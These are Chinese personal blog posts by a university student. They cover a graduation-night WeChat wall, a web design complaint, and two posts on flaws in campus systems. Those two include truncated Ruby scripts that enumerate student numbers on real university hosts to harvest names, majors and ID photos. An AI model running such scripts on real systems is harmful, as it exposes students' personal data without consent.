谁是那晚的 Super Star ? ——微信墙数据的背后

2013年6月19日晚,在华中师范大学的大学生活动中心5楼正举办着我们的大学毕业晚会。立于舞台右侧的投影上滚动显示着现场发来的微信信息,这块实时互动的 微信墙 今晚无疑是抢够了风头……   ?===准备=== 我们的毕业晚会是订在6月19日晚,而我直到18日上午才得知晚会现场需要 微博墙 或 人人墙 进行互动。微博大屏幕需提前3天申请,人人墙需要提前48小时申请…… 依托第三方的微信墙成了最后的救命稻草 能想到微信墙还归因于在人人上面看到的一张 华科大同歌同行 微信墙的照片。多方考证后,到晚上确定使用微信时,发现这个由武大开发的第三方平台很不成熟,前端需要重写 O_o~ 神奇的是,这晚我正好中暑ing ~ 熬夜作罢,所有的压力都压到了第二天 19日早上5:30开始起床code,重写界面样式,添加单条放大功能,顺手修正信息展示中的一个逻辑错误(PS:微信墙作者的前端实力实在不敢恭维~ 好在他们还年轻,前途依旧无量 =.=)。完成这些后,进一步通过自己的服务器请求来中转跳过跨域问题,使 微信墙 可以随时随地在线访问到(http://wall.ichou.cn/)。 然后就是在群里吼上一嗓子,收集BUG,Fix Bug …… 万幸bug很少,所以后面才勉强顺利一点   ===现场=== 由于场地占用问题,入场准备比预计晚了半个多小时,加上投影设备没有提前就位,留给现场调试的时间几乎变成了零。与 赵一起搭完投影,连接好电脑后,发现完全不需要再调试程序了。也几乎与此同时,第一条现场微信出现在大屏幕上,是一个很顺利的开始 晚会现场网络状况略不理想,原计划监控后台的工作由于平台后台简陋的技术处理手段和糟糕的网速变得几乎不可能了,这也意味着当晚的微信将完全没有审核和删除机制(所幸在此处这一点并不那么重要~)。同样因为网络问题,现场大屏幕的电脑随时有断网的危险,这确实是折磨了我一个晚上的问题。另外,踩掉接线板的问题也让我颇为担心~ 可最终它还是发生了 =.= 总的来说,微信墙 表现还是足够强健稳定的,面对滔滔的刷屏并没有出现让我尴尬的技术故障,给同学四年的大家留下一个完美的回忆,这已经是我最欣慰的事了。   ===后期分析=== 晚会伊始,我预测当晚的微信量会超过2000,这个数据相比起微博墙、人人墙的3位数级数据量根本就是不可同日而语。这就是微信的优势——可以肆无忌惮的发送,而不用担心刷屏带来的其他影响。 最后的数据显示: 微信墙总微信数为 1837 条,活动现场为 1749 条 (离目标就差一点点了~) 通过每分钟微信条数显示: 从数据来看,郭珩的大腿和红色小裤裤毫不留情的荡涤了观众的底线,引来了全场最高的吐槽率,完胜! 全场的几次刷屏高潮分别出现在: 18:48 —— 晚会开场之前,大部分人刚刚进入刷屏模式,各种无节操的闲扯 19:23 —— 开场视频,满载大学四年回忆的视频和老师们的一句句赠言与祝福,同志们情绪立马就激动了~ […]

华师网站漏洞报告:选课系统

漏洞地址:http://218.199.196.57/scripts/init 漏洞描述:输入学号即可得到姓名与专业   其实这个也算不上什么漏洞,只是设计者脑子进水了而已,这样的一来谁都可以拿到一份全华师本科生的 学号-姓名-专业 对照表 如果要从官方途径拿这个表可是要费些功夫的 而且据说12级的他们还怎么都不给是吧 那么就只能赞扬选课系统设计者的开源精神咯 写脚本 收走: #华师选课系统漏洞利用 Ruby 版本 # encoding: utf-8 require ‘net/http’ require ‘uri’ require “iconv” 2012210001.upto(2012214600){|num| uri = URI.parse(“http://218.199.196.57/scripts/init”) req = Net::HTTP::Post.new(uri.path) req.set_form_data(‘strVerify’ => ‘false’, ‘strUser’ => “#{num}”) req.add_field(‘Cookie’, ‘iscookies=y; domain=218.199.196.57; path=/; expires=Sun, 30 Dec 2012 23:50:49 GMT’) res = Net::HTTP.start(uri.host, uri.port) do |http| http.request(req) end conv […]

语义化Web页面实践+下载首页吐槽

还在华师下载!不是早做了嘛?明显上次那个没通过,于是我就放弃了,做这么累又没钱赚,我还不是驴 谁爱做谁做,谁有本事谁做去! 肯自己拿着PSD图写静态页面已经是我最大的让步了,不过我想也就仅此一页吧 其实我主要是不放心,不对,是根本没法接受他们写出来的页面,如果能运行就是网页的话,也许他们也没什么问题。 毕竟以前自己也是那个流派的。。。。 拿着那不知哪里浪来的首页设计图,真心无法用语言形容。倒不是我多浅薄,没见过市面,而是这东西确实太泛滥了,以至于斯。想当初自己设计的时候,光创意就够他们消化多久了。只恨了自己不懂艺术(出去我所理解的部分除外),没发将心中所想表达出来,学而不精,认栽! 没有切片,没有精确到像素,没有能证明原创的图层,没有图层规范命名,粗暴的印章工具残痕,不知为何的辅助线,甚至是没有对齐的没有等宽的大把大把的元素。。。第一美工的超凡之处,我等鼠辈能见上一次,便得震惊大半夜了 “页面现在是980的宽,拓到1000吧。” “现在是960吧” “嗯?” “你左右留有10像素边,这个也要切进去?” “哦,是哦,960” “图片哪儿是手风琴式,看得出来吗?” (没看出来)“啊,那不是要JS?怎么搞?” “嗯,自己去搜,或者留你就留在那儿。” “哟西。” ?? “华科大在线又改版了” “嗯,不过JS处理上,有些问题,导致页面会闪烁一下” “哪里?” “导航,很明显吧,上面那个图片切换应该不是自己写的吧” “应该不是,是网上找的吧” (查看源代码ing,找到被引用JS插件,截图插件信息,发送)“是这个。” “擦,连这个都没去掉” (霎时无语)“不能去吧,人家开源的,有开源协议保护的。。。话说我们暑假也写了一个JQ插件,也开源了” “我对这些东西没什么兴趣。。。” (看得出来,你没什么兴趣,否则写三句JS的问题怎么会到网上搜一大把呢?) 好吧,吐槽完了,感觉自己像个坏人一样。虽然牢骚了这么多,其实人家也还是值得尊敬的,至少很坦诚,没你这家伙一样腹黑。不爽就给我吞下去吧,或者发向它真正的起源之地,怎么想他也不过是个可以迁怒的对象而已。。。说到底,我们都是受害者! 想想你在这个组织里也挺久了,最要好的朋友不也算他一个么?虽然有点2,大家都有点2,谁是装的,谁是真的,谁又知道呢?这若定义为 ?工友级朋友 ?,以后这样的朋友还会有吗?多吗? 不好吗?   再来说这半个晚上搞出来的下载中心的美工组版的静态首页 或是赌气,或是练习,亦或二者都是。这是一个真正的语义化Web页面,这次没有偷懒,把这些常挂在嘴边的概念彻彻底底的实践了一把,这感觉还真是酣畅淋漓。 全页只有一个无语义标签(回头就干掉它) <div style=”clear:both;”></div> 完成后,仍不满意,再用一些HTML5标签重构一次 心满意足,写完博客就睡觉,早安,华师!

华师本科生证件照下载BUG

hust-facemash.com 已经昙花一现的火爆了一把 各大媒体都是使用的“黑客”这个称呼 想想也是啊 他们的作为姑且也可以算做“黑客”了哈   关于华师信息门户的漏洞 这也不是第一个了 跨站验证的漏洞DD都已经投入使用了 而且神不知鬼不觉 我也曾两次准备将这个漏洞用于官方的某些网站系统上 但是最终都没能让我如愿以尝 给网络中心的老师讲这个漏洞的存在与危害。。 他一副完全听不懂的样子 试图让他同意我设计一个API接口 以使这个漏洞合法化 规范化 明显他完全无法理解为什么要做这么一个东西 (其实利用漏洞时有些敏感信息只是副产品 不是设计者真正想要的?所以这就是API存在的意义:提供你想要的 保护你不能看到的 ?可惜很多信息中心的管理者还看不到这点 于是就有很多人盯着它的漏洞而不是接口)   这次的证件照下载 老实说连BUG都算不上 只是单纯的没考虑安全问题 其实这样的漏洞校各网站 不计其数 比如比较奇葩的前学子网 更改板块会清空数据库 原因是一行操作数据库的代码写错了 不,应该是copy错了 ?etc.   这个学期在网络中心也经历过两次由于攻击全校突然断网的情况 ,对于不知情的广大同学来说大概只会骂:该死的校园网 有抽风了。 不过对我们来说,心情是无比激动!   江2货一直嚷嚷着走之前要在学校网络里好好搞一把,当然他就是个2货,老邓对他貌似也没什么防范。。。还不如我(至少现在是这样) 我想开个远程老邓就如坐针毡 DD这家伙从没想过入侵啊,搞死搞残什么的,但是到目前为止信息门户的漏洞都是他在挖掘,不客气的说:他就是华师信息门户最大的Bug。   最后放个下载样例,以免以后忘了: RUBY 版 ?By:Xworm 2011210001.upto(2011214600){|num| require ‘open-uri’ url = “http://202.114.32.143/xj/jw/xj/studentmng.do?method=showPic&zzp=/stdpic/photo2011/2011photo/#{num}.jpg” open(url) […]